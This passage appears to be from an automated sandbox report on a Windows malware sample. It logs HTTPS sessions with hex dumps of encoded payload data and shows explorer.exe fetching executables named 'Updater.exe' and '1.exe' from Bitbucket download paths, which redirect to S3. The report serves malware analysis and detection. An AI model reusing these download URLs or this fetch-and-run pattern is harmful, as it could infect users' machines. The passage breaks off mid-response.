                                                                                                                                                        2021-12-28 02:23:57 UTC766INData Raw: 57 ff b3 50 cd cc c5 0e 5d 52 f1 31 72 24 ce 36 4d c7 6b 6f 5a 89 4d fd db ab b2 d4 2f d1 26 43 59 41 54 9e 67 64 40 e7 a9 b5 c5 b6 6b b5 69 39 fd 6b 6e 9e 4d 66 09 54 3e bd 04 29 9f 1e ec 1a 7c be 1c 5c ed 18 ba 4a 3e cb 17 34 0c 80 a9 d2 d1 a9 db 45 46 9a c6 7f a9 ee 86 ee fe 85 27 d6 c8 70 f8 d3 33 61 d2 f6 17 3f 7d fa 0d 51 a6 9f e4 ff d5 4c 1a 0a 27 54 c1 e6 9d 2d 8d b2 21 d5 5f 59 ca f3 7c a6 96 a1 64 4f 86 b8 f4 6e 5e 37 d4 23 5d 58 2b 0d f5 89 7a cb a1 76 2e 8a c0 b6 94 32 dc ea e6 ca ea 5b 6d 32 74 42 cb c1 8f 02 c3 82 cb 78 73 3b 2a 9c 75 a8 a1 8e 65 03 b6 c6 4a c6 d9 20 38 8f 8e da 32 f5 d1 0b 76 54 ef 62 fe 35 d6 4b f1 00 bb f8 3d 4d d3 e7 d1 b6 2a 21 06 24 d0 2b 39 1b 13 da b8 d3 b6 e7 26 20 b1 53 56 82 a4 9b 00 f4 e0 cf 16 bf 0a fc 5c e0 6c
                                                                                                                                                        Data Ascii: WP]R1r$6MkoZM/&CYATgd@ki9knMfT>)|\J>4EF'p3a?}QL'T-!_Y|dOn^7#]X+zv.2[m2tBxs;*ueJ 82vTb5K=M*!$+9& SV\l
                                                                                                                                                        2021-12-28 02:23:57 UTC782INData Raw: 00 67 00 66 00 55 00 73 00 5a 00 75 00 2b 00 77 00 61 00 76 00 56 00 4b 00 57 00 35 00 2f 00 77 00 33 00 79 00 57 00 6d 00 73 00 48 00 4d 00 6b 00 45 00 69 00 78 00 6a 00 75 00 62 00 64 00 4b 00 52 00 70 00 4e 00 41 00 44 00 37 00 49 00 43 00 62 00 73 00 4b 00 38 00 48 00 48 00 4a 00 37 00 31 00 41 00 37 00 33 00 4f 00 59 00 2f 00 39 00 30 00 75 00 67 00 51 00 53 00 47 00 37 00 35 00 4d 00 51 00 6d 00 35 00 6c 00 30 00 6d 00 41 00 67 00 6b 00 79 00 5a 00 53 00 76 00 2b 00 66 00 48 00 6d 00 70 00 42 00 31 00 49 00 70 00 6f 00 73 00 72 00 59 00 75 00 79 00 76 00 46 00 69 00 49 00 6a 00 7a 00 37 00 6a 00 52 00 4f 00 51 00 59 00 74 00 33 00 51 00 65 00 70 00 6a 00 65 00 4c 00 37 00 6d 00 54 00 46 00 53 00 6f 00 4b 00 68 00 41 00 49 00 31 00 75 00 62 00 2f 00
                                                                                                                                                        Data Ascii: gfUsZu+wavVKW5/w3yWmsHMkEixjubdKRpNAD7ICbsK8HHJ71A73OY/90ugQSG75MQm5l0mAgkyZSv+fHmpB1IposrYuyvFiIjz7jROQYt3QepjeL7mTFSoKhAI1ub/
                                                                                                                                                        2021-12-28 02:23:57 UTC798INData Raw: 00 62 00 62 00 54 00 43 00 53 00 53 00 4f 00 62 00 51 00 39 00 7a 00 2f 00 46 00 68 00 57 00 62 00 52 00 32 00 57 00 49 00 43 00 4f 00 75 00 42 00 32 00 4d 00 51 00 4d 00 4e 00 65 00 56 00 72 00 33 00 63 00 75 00 54 00 4c 00 46 00 41 00 7a 00 6a 00 31 00 66 00 57 00 69 00 70 00 4c 00 5a 00 48 00 61 00 72 00 79 00 6a 00 51 00 2f 00 76 00 65 00 70 00 4e 00 55 00 48 00 2f 00 64 00 43 00 62 00 49 00 48 00 41 00 4e 00 47 00 61 00 6c 00 56 00 71 00 78 00 71 00 54 00 2b 00 71 00 50 00 6f 00 72 00 4a 00 38 00 64 00 71 00 63 00 38 00 56 00 38 00 6a 00 2f 00 54 00 69 00 4d 00 73 00 75 00 47 00 6f 00 76 00 57 00 73 00 58 00 39 00 5a 00 53 00 33 00 75 00 51 00 50 00 33 00 51 00 33 00 47 00 35 00 69 00 73 00 75 00 6b 00 62 00 32 00 51 00 6d 00 61 00 43 00 53 00 34 00
                                                                                                                                                        Data Ascii: bbTCSSObQ9z/FhWbR2WICOuB2MQMNeVr3cuTLFAzj1fWipLZHaryjQ/vepNUH/dCbIHANGalVqxqT+qPorJ8dqc8V8j/TiMsuGovWsX9ZS3uQP3Q3G5isukb2QmaCS4
                                                                                                                                                        2021-12-28 02:23:57 UTC814INData Raw: 00 39 00 48 00 57 00 62 00 4d 00 4d 00 79 00 44 00 61 00 4b 00 74 00 4c 00 56 00 30 00 75 00 49 00 4e 00 37 00 6b 00 5a 00 43 00 76 00 52 00 63 00 34 00 58 00 79 00 2f 00 52 00 74 00 4f 00 73 00 52 00 4d 00 31 00 73 00 59 00 5a 00 37 00 42 00 2b 00 6e 00 7a 00 41 00 79 00 68 00 30 00 6e 00 63 00 64 00 4a 00 2b 00 41 00 61 00 6c 00 4b 00 53 00 37 00 51 00 63 00 76 00 53 00 4a 00 6e 00 71 00 37 00 33 00 45 00 4b 00 55 00 6d 00 31 00 67 00 79 00 6f 00 73 00 57 00 4a 00 4e 00 4c 00 71 00 31 00 76 00 4a 00 63 00 41 00 61 00 69 00 4d 00 41 00 79 00 75 00 39 00 4f 00 62 00 75 00 79 00 43 00 50 00 37 00 67 00 4b 00 63 00 53 00 45 00 49 00 4d 00 4f 00 52 00 48 00 53 00 4b 00 66 00 48 00 2f 00 5a 00 41 00 67 00 65 00 4d 00 52 00 6a 00 54 00 63 00 65 00 55 00 51 00
                                                                                                                                                        Data Ascii: 9HWbMMyDaKtLV0uIN7kZCvRc4Xy/RtOsRM1sYZ7B+nzAyh0ncdJ+AalKS7QcvSJnq73EKUm1gyosWJNLq1vJcAaiMAyu9ObuyCP7gKcSEIMORHSKfH/ZAgeMRjTceUQ
                                                                                                                                                        2021-12-28 02:23:57 UTC830INData Raw: 00 6c 00 72 00 74 00 41 00 67 00 36 00 58 00 79 00 45 00 61 00 6d 00 6d 00 63 00 50 00 68 00 47 00 4d 00 58 00 32 00 62 00 5a 00 65 00 58 00 35 00 33 00 39 00 6b 00 6d 00 52 00 65 00 49 00 42 00 32 00 71 00 49 00 53 00 58 00 6d 00 54 00 41 00 4d 00 50 00 64 00 51 00 68 00 4e 00 33 00 6a 00 30 00 77 00 61 00 62 00 76 00 36 00 6d 00 65 00 38 00 47 00 64 00 65 00 76 00 71 00 49 00 75 00 4d 00 4a 00 64 00 72 00 32 00 30 00 47 00 7a 00 62 00 68 00 68 00 37 00 4a 00 36 00 4a 00 48 00 7a 00 35 00 50 00 30 00 65 00 34 00 36 00 74 00 6e 00 65 00 7a 00 58 00 63 00 4a 00 32 00 43 00 42 00 74 00 65 00 75 00 7a 00 2f 00 36 00 32 00 30 00 71 00 6c 00 56 00 6e 00 4c 00 41 00 71 00 6b 00 55 00 4c 00 6b 00 34 00 4f 00 31 00 47 00 6e 00 4f 00 52 00 74 00 71 00 4a 00 67 00
                                                                                                                                                        Data Ascii: lrtAg6XyEammcPhGMX2bZeX539kmReIB2qISXmTAMPdQhN3j0wabv6me8GdevqIuMJdr20Gzbhh7J6JHz5P0e46tnezXcJ2CBteuz/620qlVnLAqkULk4O1GnORtqJg
                                                                                                                                                        2021-12-28 02:23:57 UTC846INData Raw: 00 63 00 52 00 6e 00 54 00 39 00 4e 00 74 00 58 00 34 00 69 00 4e 00 71 00 70 00 52 00 39 00 73 00 42 00 6e 00 58 00 55 00 2b 00 75 00 39 00 6f 00 51 00 78 00 65 00 31 00 43 00 56 00 65 00 63 00 35 00 6a 00 4e 00 50 00 74 00 6e 00 2b 00 64 00 4a 00 47 00 65 00 6b 00 78 00 33 00 59 00 70 00 73 00 53 00 78 00 41 00 71 00 44 00 6a 00 63 00 6c 00 4e 00 38 00 2f 00 36 00 67 00 45 00 4e 00 75 00 47 00 34 00 47 00 57 00 62 00 41 00 6a 00 67 00 42 00 34 00 2f 00 6a 00 4b 00 51 00 77 00 46 00 4c 00 41 00 65 00 6f 00 66 00 65 00 71 00 32 00 2b 00 52 00 66 00 48 00 48 00 4f 00 6c 00 6f 00 6b 00 47 00 6d 00 79 00 51 00 45 00 50 00 6e 00 61 00 72 00 51 00 4a 00 58 00 69 00 4b 00 33 00 52 00 34 00 35 00 4f 00 2f 00 79 00 6b 00 52 00 4c 00 61 00 67 00 6f 00 6a 00 64 00
                                                                                                                                                        Data Ascii: cRnT9NtX4iNqpR9sBnXU+u9oQxe1CVec5jNPtn+dJGekx3YpsSxAqDjclN8/6gENuG4GWbAjgB4/jKQwFLAeofeq2+RfHHOlokGmyQEPnarQJXiK3R45O/ykRLagojd
                                                                                                                                                        2021-12-28 02:23:57 UTC862INData Raw: 00 51 00 4e 00 78 00 79 00 47 00 42 00 42 00 57 00 49 00 76 00 6e 00 58 00 51 00 46 00 36 00 5a 00 36 00 7a 00 6b 00 73 00 53 00 76 00 44 00 35 00 6e 00 49 00 79 00 4d 00 69 00 6c 00 44 00 32 00 6e 00 6c 00 76 00 47 00 6e 00 77 00 77 00 57 00 42 00 55 00 51 00 50 00 57 00 76 00 34 00 4e 00 4e 00 75 00 30 00 44 00 67 00 47 00 31 00 4c 00 34 00 33 00 56 00 71 00 6e 00 33 00 47 00 57 00 73 00 52 00 58 00 4d 00 42 00 37 00 76 00 6c 00 32 00 61 00 6d 00 39 00 36 00 49 00 30 00 77 00 69 00 48 00 7a 00 62 00 4f 00 37 00 67 00 68 00 55 00 58 00 41 00 5a 00 69 00 66 00 72 00 32 00 61 00 4d 00 6e 00 6a 00 69 00 39 00 30 00 49 00 30 00 64 00 38 00 36 00 6b 00 67 00 4f 00 4c 00 67 00 75 00 6c 00 39 00 6a 00 56 00 32 00 54 00 74 00 57 00 7a 00 6f 00 64 00 53 00 4a 00
                                                                                                                                                        Data Ascii: QNxyGBBWIvnXQF6Z6zksSvD5nIyMilD2nlvGnwwWBUQPWv4NNu0DgG1L43Vqn3GWsRXMB7vl2am96I0wiHzbO7ghUXAZifr2aMnji90I0d86kgOLgul9jV2TtWzodSJ
                                                                                                                                                        2021-12-28 02:23:57 UTC878INData Raw: 00 4d 00 32 00 6e 00 38 00 54 00 49 00 75 00 33 00 39 00 71 00 65 00 56 00 46 00 68 00 43 00 2b 00 74 00 73 00 6e 00 6b 00 56 00 6b 00 77 00 47 00 66 00 32 00 74 00 78 00 55 00 57 00 70 00 70 00 76 00 37 00 43 00 59 00 6a 00 44 00 49 00 79 00 36 00 31 00 48 00 64 00 37 00 31 00 64 00 39 00 4e 00 44 00 65 00 43 00 69 00 6e 00 58 00 4f 00 4d 00 62 00 35 00 77 00 63 00 39 00 54 00 66 00 44 00 64 00 6f 00 2f 00 68 00 71 00 44 00 45 00 52 00 74 00 55 00 34 00 4a 00 39 00 46 00 33 00 47 00 2f 00 4e 00 56 00 6b 00 43 00 49 00 2f 00 6f 00 61 00 49 00 36 00 56 00 6e 00 30 00 2b 00 4e 00 6d 00 49 00 69 00 76 00 75 00 56 00 47 00 6b 00 6d 00 4f 00 50 00 4c 00 32 00 66 00 79 00 7a 00 6e 00 6c 00 76 00 74 00 49 00 63 00 32 00 7a 00 77 00 4f 00 31 00 57 00 33 00 56 00
                                                                                                                                                        Data Ascii: M2n8TIu39qeVFhC+tsnkVkwGf2txUWppv7CYjDIy61Hd71d9NDeCinXOMb5wc9TfDdo/hqDERtU4J9F3G/NVkCI/oaI6Vn0+NmIivuVGkmOPL2fyznlvtIc2zwO1W3V
                                                                                                                                                        2021-12-28 02:23:57 UTC894INData Raw: 00 34 00 66 00 52 00 52 00 36 00 33 00 6a 00 4d 00 58 00 70 00 6d 00 78 00 55 00 76 00 47 00 54 00 76 00 62 00 68 00 6e 00 50 00 4a 00 32 00 58 00 4e 00 4f 00 56 00 4b 00 5a 00 47 00 35 00 65 00 34 00 54 00 59 00 6c 00 74 00 38 00 4a 00 6b 00 63 00 59 00 6b 00 61 00 30 00 63 00 32 00 67 00 79 00 56 00 32 00 34 00 72 00 39 00 49 00 74 00 72 00 79 00 68 00 67 00 32 00 41 00 74 00 48 00 41 00 6f 00 66 00 6a 00 45 00 4e 00 64 00 61 00 48 00 47 00 4a 00 6e 00 6d 00 32 00 59 00 55 00 53 00 78 00 70 00 6a 00 4e 00 4d 00 45 00 6d 00 69 00 48 00 33 00 77 00 55 00 32 00 47 00 39 00 43 00 2f 00 42 00 33 00 48 00 51 00 4a 00 78 00 44 00 2b 00 6c 00 75 00 33 00 30 00 6a 00 68 00 4b 00 4a 00 69 00 46 00 79 00 59 00 66 00 75 00 62 00 6c 00 70 00 7a 00 32 00 67 00 2f 00
                                                                                                                                                        Data Ascii: 4fRR63jMXpmxUvGTvbhnPJ2XNOVKZG5e4TYlt8JkcYka0c2gyV24r9Itryhg2AtHAofjENdaHGJnm2YUSxpjNMEmiH3wU2G9C/B3HQJxD+lu30jhKJiFyYfublpz2g/
                                                                                                                                                        2021-12-28 02:23:57 UTC910INData Raw: 00 71 00 71 00 52 00 45 00 6a 00 50 00 32 00 73 00 4e 00 4a 00 73 00 67 00 39 00 6b 00 59 00 33 00 59 00 41 00 6c 00 59 00 30 00 64 00 79 00 6d 00 44 00 38 00 5a 00 63 00 78 00 67 00 34 00 48 00 61 00 55 00 6e 00 6b 00 66 00 2f 00 4c 00 37 00 53 00 48 00 46 00 59 00 52 00 71 00 45 00 45 00 52 00 38 00 69 00 6d 00 79 00 38 00 6a 00 58 00 58 00 62 00 6b 00 53 00 6c 00 31 00 48 00 63 00 59 00 37 00 56 00 77 00 45 00 53 00 38 00 76 00 6a 00 31 00 31 00 79 00 52 00 6c 00 4a 00 6d 00 4d 00 67 00 37 00 66 00 70 00 47 00 76 00 4d 00 6a 00 34 00 32 00 47 00 42 00 63 00 4f 00 2f 00 6b 00 37 00 71 00 70 00 74 00 30 00 49 00 63 00 79 00 6f 00 61 00 34 00 6f 00 69 00 43 00 53 00 6e 00 32 00 73 00 77 00 6e 00 6a 00 50 00 62 00 73 00 6a 00 68 00 74 00 6a 00 4b 00 6b 00
                                                                                                                                                        Data Ascii: qqREjP2sNJsg9kY3YAlY0dymD8Zcxg4HaUnkf/L7SHFYRqEER8imy8jXXbkSl1HcY7VwES8vj11yRlJmMg7fpGvMj42GBcO/k7qpt0Icyoa4oiCSn2swnjPbsjhtjKk
                                                                                                                                                        2021-12-28 02:23:57 UTC926INData Raw: 00 68 00 47 00 42 00 51 00 47 00 52 00 32 00 6d 00 43 00 4f 00 6f 00 6e 00 35 00 45 00 6d 00 34 00 37 00 4f 00 77 00 77 00 4d 00 47 00 5a 00 74 00 64 00 68 00 6e 00 54 00 74 00 6f 00 4b 00 4f 00 58 00 42 00 63 00 30 00 79 00 5a 00 75 00 56 00 6f 00 4e 00 4e 00 44 00 57 00 38 00 32 00 6f 00 67 00 42 00 45 00 7a 00 6c 00 62 00 38 00 34 00 39 00 33 00 38 00 58 00 61 00 41 00 73 00 76 00 75 00 34 00 50 00 66 00 56 00 66 00 44 00 4c 00 54 00 2f 00 53 00 4e 00 71 00 4d 00 69 00 54 00 74 00 69 00 4a 00 4c 00 77 00 70 00 38 00 74 00 36 00 51 00 73 00 4e 00 31 00 57 00 46 00 70 00 36 00 37 00 50 00 50 00 63 00 2b 00 78 00 53 00 46 00 54 00 43 00 47 00 43 00 73 00 53 00 70 00 4f 00 68 00 38 00 4e 00 52 00 68 00 49 00 41 00 57 00 4c 00 4b 00 64 00 5a 00 78 00 44 00
                                                                                                                                                        Data Ascii: hGBQGR2mCOon5Em47OwwMGZtdhnTtoKOXBc0yZuVoNNDW82ogBEzlb84938XaAsvu4PfVfDLT/SNqMiTtiJLwp8t6QsN1WFp67PPc+xSFTCGCsSpOh8NRhIAWLKdZxD
                                                                                                                                                        2021-12-28 02:23:57 UTC942INData Raw: 00 51 00 73 00 68 00 6d 00 46 00 48 00 4a 00 44 00 64 00 58 00 7a 00 61 00 38 00 6b 00 57 00 4a 00 72 00 70 00 72 00 52 00 65 00 79 00 44 00 73 00 75 00 4b 00 59 00 4d 00 44 00 4d 00 32 00 50 00 49 00 38 00 63 00 76 00 57 00 57 00 36 00 4e 00 71 00 4d 00 59 00 32 00 33 00 39 00 73 00 41 00 76 00 53 00 65 00 59 00 32 00 6b 00 77 00 48 00 49 00 45 00 43 00 59 00 6f 00 79 00 4b 00 66 00 52 00 2f 00 52 00 79 00 56 00 71 00 42 00 54 00 6e 00 2f 00 64 00 57 00 71 00 73 00 4b 00 54 00 52 00 41 00 42 00 52 00 72 00 4c 00 64 00 2b 00 50 00 4f 00 64 00 34 00 4a 00 48 00 76 00 44 00 31 00 46 00 70 00 6f 00 69 00 6e 00 31 00 57 00 58 00 66 00 62 00 77 00 61 00 67 00 76 00 66 00 76 00 58 00 4e 00 75 00 31 00 53 00 54 00 7a 00 34 00 37 00 72 00 4f 00 31 00 44 00 68 00
                                                                                                                                                        Data Ascii: QshmFHJDdXza8kWJrprReyDsuKYMDM2PI8cvWW6NqMY239sAvSeY2kwHIECYoyKfR/RyVqBTn/dWqsKTRABRrLd+POd4JHvD1Fpoin1WXfbwagvfvXNu1STz47rO1Dh
                                                                                                                                                        2021-12-28 02:23:57 UTC958INData Raw: 00 4f 00 39 00 4f 00 76 00 51 00 44 00 30 00 6e 00 34 00 63 00 61 00 55 00 71 00 4c 00 46 00 2b 00 4c 00 6e 00 31 00 4a 00 35 00 46 00 75 00 4b 00 65 00 6c 00 6b 00 4a 00 39 00 76 00 77 00 73 00 54 00 2f 00 4f 00 44 00 6f 00 66 00 66 00 62 00 2b 00 64 00 62 00 73 00 6f 00 63 00 33 00 67 00 63 00 32 00 55 00 38 00 4e 00 31 00 35 00 30 00 55 00 7a 00 4d 00 75 00 69 00 63 00 61 00 37 00 39 00 78 00 4d 00 58 00 51 00 50 00 76 00 46 00 55 00 6e 00 56 00 58 00 4d 00 38 00 4c 00 51 00 68 00 36 00 35 00 78 00 53 00 49 00 4e 00 6a 00 36 00 41 00 6c 00 63 00 77 00 37 00 66 00 44 00 52 00 55 00 4e 00 64 00 58 00 51 00 43 00 51 00 42 00 75 00 63 00 44 00 78 00 73 00 63 00 62 00 48 00 73 00 68 00 37 00 33 00 35 00 5a 00 58 00 38 00 6c 00 4d 00 65 00 66 00 79 00 6b 00
                                                                                                                                                        Data Ascii: O9OvQD0n4caUqLF+Ln1J5FuKelkJ9vwsT/ODoffb+dbsoc3gc2U8N150UzMuica79xMXQPvFUnVXM8LQh65xSINj6Alcw7fDRUNdXQCQBucDxscbHsh735ZX8lMefyk
                                                                                                                                                        2021-12-28 02:23:57 UTC974INData Raw: 00 69 00 46 00 6a 00 72 00 63 00 74 00 43 00 59 00 57 00 5a 00 6b 00 6f 00 39 00 65 00 5a 00 6e 00 74 00 79 00 56 00 4d 00 65 00 4f 00 70 00 63 00 32 00 58 00 36 00 47 00 46 00 42 00 4c 00 4b 00 31 00 35 00 70 00 62 00 4e 00 69 00 35 00 4c 00 62 00 4c 00 72 00 6c 00 63 00 4e 00 2b 00 4f 00 48 00 73 00 34 00 59 00 71 00 46 00 4e 00 55 00 4f 00 64 00 37 00 32 00 64 00 30 00 74 00 33 00 6f 00 30 00 55 00 73 00 50 00 34 00 6d 00 55 00 50 00 4f 00 55 00 4f 00 39 00 52 00 69 00 72 00 67 00 64 00 74 00 52 00 70 00 61 00 61 00 55 00 45 00 78 00 6c 00 6c 00 79 00 6b 00 6e 00 7a 00 6b 00 74 00 6e 00 74 00 49 00 4d 00 70 00 41 00 74 00 35 00 72 00 33 00 59 00 57 00 71 00 66 00 54 00 4d 00 61 00 52 00 4d 00 51 00 69 00 5a 00 4e 00 34 00 4e 00 52 00 62 00 77 00 78 00
                                                                                                                                                        Data Ascii: iFjrctCYWZko9eZntyVMeOpc2X6GFBLK15pbNi5LbLrlcN+OHs4YqFNUOd72d0t3o0UsP4mUPOUO9RirgdtRpaaUExllyknzktntIMpAt5r3YWqfTMaRMQiZN4NRbwx
                                                                                                                                                        2021-12-28 02:23:57 UTC990INData Raw: 00 69 00 6f 00 70 00 52 00 61 00 50 00 45 00 49 00 79 00 4c 00 6d 00 73 00 6e 00 58 00 56 00 66 00 77 00 4f 00 4f 00 4a 00 71 00 49 00 6c 00 63 00 79 00 69 00 55 00 76 00 67 00 77 00 32 00 4d 00 5a 00 5a 00 6d 00 32 00 56 00 50 00 69 00 43 00 44 00 4f 00 75 00 62 00 57 00 31 00 57 00 2b 00 41 00 55 00 31 00 76 00 69 00 42 00 52 00 35 00 76 00 58 00 45 00 36 00 44 00 5a 00 76 00 4b 00 45 00 34 00 35 00 31 00 41 00 2b 00 54 00 6c 00 37 00 37 00 4e 00 61 00 78 00 46 00 56 00 6d 00 54 00 52 00 6b 00 79 00 36 00 65 00 55 00 39 00 73 00 52 00 38 00 6e 00 39 00 4b 00 52 00 63 00 6e 00 46 00 34 00 65 00 45 00 73 00 4c 00 68 00 73 00 31 00 69 00 68 00 59 00 71 00 66 00 78 00 6e 00 64 00 78 00 42 00 6f 00 52 00 4e 00 49 00 41 00 4b 00 77 00 51 00 6d 00 43 00 6b 00
                                                                                                                                                        Data Ascii: iopRaPEIyLmsnXVfwOOJqIlcyiUvgw2MZZm2VPiCDOubW1W+AU1viBR5vXE6DZvKE451A+Tl77NaxFVmTRky6eU9sR8n9KRcnF4eEsLhs1ihYqfxndxBoRNIAKwQmCk
                                                                                                                                                        2021-12-28 02:23:57 UTC1006INData Raw: 00 41 00 4e 00 51 00 61 00 32 00 41 00 72 00 57 00 35 00 61 00 31 00 42 00 69 00 48 00 48 00 38 00 36 00 78 00 70 00 42 00 4b 00 38 00 51 00 57 00 68 00 2f 00 44 00 63 00 6b 00 45 00 4a 00 53 00 45 00 61 00 42 00 50 00 31 00 65 00 44 00 75 00 76 00 51 00 2f 00 57 00 48 00 32 00 79 00 53 00 66 00 63 00 46 00 70 00 72 00 36 00 68 00 62 00 35 00 61 00 42 00 79 00 71 00 54 00 4e 00 5a 00 73 00 74 00 75 00 6e 00 6d 00 30 00 49 00 68 00 37 00 75 00 30 00 33 00 52 00 57 00 4c 00 4b 00 46 00 32 00 68 00 2b 00 4e 00 62 00 41 00 73 00 47 00 77 00 54 00 4f 00 31 00 34 00 67 00 78 00 43 00 37 00 6d 00 37 00 42 00 64 00 2b 00 61 00 51 00 4d 00 73 00 6c 00 7a 00 30 00 71 00 76 00 44 00 66 00 4b 00 68 00 47 00 36 00 7a 00 75 00 62 00 6b 00 35 00 68 00 6a 00 45 00 78 00
                                                                                                                                                        Data Ascii: ANQa2ArW5a1BiHH86xpBK8QWh/DckEJSEaBP1eDuvQ/WH2ySfcFpr6hb5aByqTNZstunm0Ih7u03RWLKF2h+NbAsGwTO14gxC7m7Bd+aQMslz0qvDfKhG6zubk5hjEx
                                                                                                                                                        2021-12-28 02:23:57 UTC1022INData Raw: 00 6f 00 79 00 69 00 51 00 56 00 70 00 76 00 70 00 48 00 49 00 5a 00 48 00 74 00 41 00 44 00 33 00 6c 00 76 00 2f 00 49 00 37 00 43 00 43 00 4f 00 71 00 4e 00 62 00 6e 00 4d 00 63 00 6f 00 33 00 38 00 69 00 69 00 54 00 74 00 6b 00 68 00 49 00 43 00 62 00 33 00 41 00 74 00 6c 00 74 00 77 00 4b 00 70 00 2b 00 77 00 49 00 38 00 38 00 2f 00 36 00 70 00 76 00 53 00 61 00 70 00 2b 00 48 00 7a 00 39 00 4d 00 44 00 6d 00 43 00 6f 00 46 00 64 00 43 00 36 00 37 00 5a 00 65 00 65 00 7a 00 48 00 4c 00 39 00 72 00 36 00 51 00 6f 00 64 00 72 00 34 00 4b 00 54 00 71 00 4b 00 72 00 31 00 35 00 30 00 45 00 4f 00 64 00 6b 00 50 00 4b 00 6d 00 7a 00 37 00 58 00 58 00 77 00 4e 00 34 00 42 00 6f 00 75 00 37 00 43 00 72 00 6c 00 4e 00 54 00 65 00 6c 00 69 00 7a 00 6f 00 38 00
                                                                                                                                                        Data Ascii: oyiQVpvpHIZHtAD3lv/I7CCOqNbnMco38iiTtkhICb3AtltwKp+wI88/6pvSap+Hz9MDmCoFdC67ZeezHL9r6Qodr4KTqKr150EOdkPKmz7XXwN4Bou7CrlNTelizo8
                                                                                                                                                        2021-12-28 02:23:57 UTC1038INData Raw: 00 31 00 2b 00 52 00 53 00 32 00 36 00 6e 00 66 00 48 00 63 00 37 00 31 00 42 00 72 00 51 00 6c 00 43 00 6a 00 6f 00 41 00 59 00 63 00 6c 00 2b 00 36 00 31 00 6c 00 43 00 4a 00 42 00 38 00 72 00 31 00 44 00 45 00 61 00 6d 00 54 00 6a 00 69 00 6d 00 4e 00 73 00 58 00 4b 00 6c 00 36 00 76 00 47 00 57 00 6b 00 6d 00 76 00 4b 00 67 00 37 00 54 00 31 00 50 00 6a 00 2b 00 31 00 33 00 37 00 58 00 49 00 4c 00 35 00 36 00 6e 00 47 00 77 00 39 00 44 00 57 00 67 00 2f 00 4d 00 6d 00 39 00 34 00 47 00 74 00 7a 00 30 00 51 00 2f 00 64 00 76 00 6b 00 4b 00 6e 00 6e 00 75 00 77 00 43 00 6c 00 53 00 50 00 31 00 6c 00 46 00 74 00 39 00 53 00 32 00 67 00 45 00 48 00 77 00 4e 00 6a 00 4a 00 55 00 77 00 31 00 6d 00 57 00 53 00 7a 00 44 00 77 00 58 00 6f 00 6e 00 6c 00 37 00
                                                                                                                                                        Data Ascii: 1+RS26nfHc71BrQlCjoAYcl+61lCJB8r1DEamTjimNsXKl6vGWkmvKg7T1Pj+137XIL56nGw9DWg/Mm94Gtz0Q/dvkKnnuwClSP1lFt9S2gEHwNjJUw1mWSzDwXonl7


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        10192.168.2.349882104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:24:16 UTC6040OUTGET /georgindesign/desingner/downloads/Updater.exe HTTP/1.1
                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                        2021-12-28 02:24:16 UTC6040INHTTP/1.1 302 Found
                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                        Server: nginx
                                                                                                                                                        X-Usage-Quota-Remaining: 999256.574
                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                        X-Usage-Request-Cost: 757.10
                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        X-B3-TraceId: 22748379e11deb4f
                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                        X-Dc-Location: Micros
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:16 GMT
                                                                                                                                                        X-Usage-User-Time: 0.022015
                                                                                                                                                        X-Usage-System-Time: 0.000698
                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/92ba8c23-8aea-43a8-8c90-5268da4578cd/downloads/ed286f45-4637-4642-91fa-a2cc7183b8f7/Updater.exe?Signature=0JaZo66y%2B0tp9McoMbPCSB8DkyM%3D&Expires=1640659767&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=Kpo80iiyF6jT6nXORaRmcizKKRyl.N4i&response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22
                                                                                                                                                        X-Served-By: af165ae500f1
                                                                                                                                                        Expires: Tue, 28 Dec 2021 02:24:16 GMT
                                                                                                                                                        Content-Language: en
                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                        X-Static-Version: dfb18959be9c
                                                                                                                                                        X-Render-Time: 0.0476350784302
                                                                                                                                                        Connection: close
                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                        X-Request-Count: 2860
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Version: dfb18959be9c
                                                                                                                                                        X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                        Content-Length: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        2192.168.2.349854104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:23:58 UTC1052OUTGET /evangelioshas/2/downloads/1.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                        2021-12-28 02:23:59 UTC1053INHTTP/1.1 302 Found
